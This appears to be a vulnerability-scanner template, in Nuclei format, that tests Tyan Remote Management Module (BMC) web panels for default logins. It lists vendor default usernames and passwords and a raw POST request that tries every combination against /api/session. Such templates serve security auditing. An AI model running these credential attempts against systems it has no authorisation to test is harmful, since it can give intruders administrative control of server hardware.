id: tyan-rmm-bmc-default-login

info:
  name: Tyan Remote Management Module (RMM) Default Login
  description: Tyan Remote Management Module (RMM) Default Login
  author: c-sh0
  severity: high
  reference:
    - ftp://ftp.tyan.com/doc/AST2500_UG_v1.0b.pdf
    - https://blog.mpecsinc.com/2020/03/30/tyan-rmm-tips-default-username-and-password-plus-set-up-tips/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  tags: default-login,panel,bmc,tyan

requests:
  - raw:
      - |
        POST /api/session HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        username={{username}}&password={{password}}

    attack: clusterbomb
    payloads:
      username:
        - ADMIN
        - admin
        - sysadmin
        - root
        - USERID
      password:
        - ADMIN
        - admin
        - superuser
        - PASSW0RD

    cookie-reuse: true
    stop-at-first-match: true
    redirects: false
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - "\"racsession_id\":"
          - "\"CSRFToken\":"
        condition: and
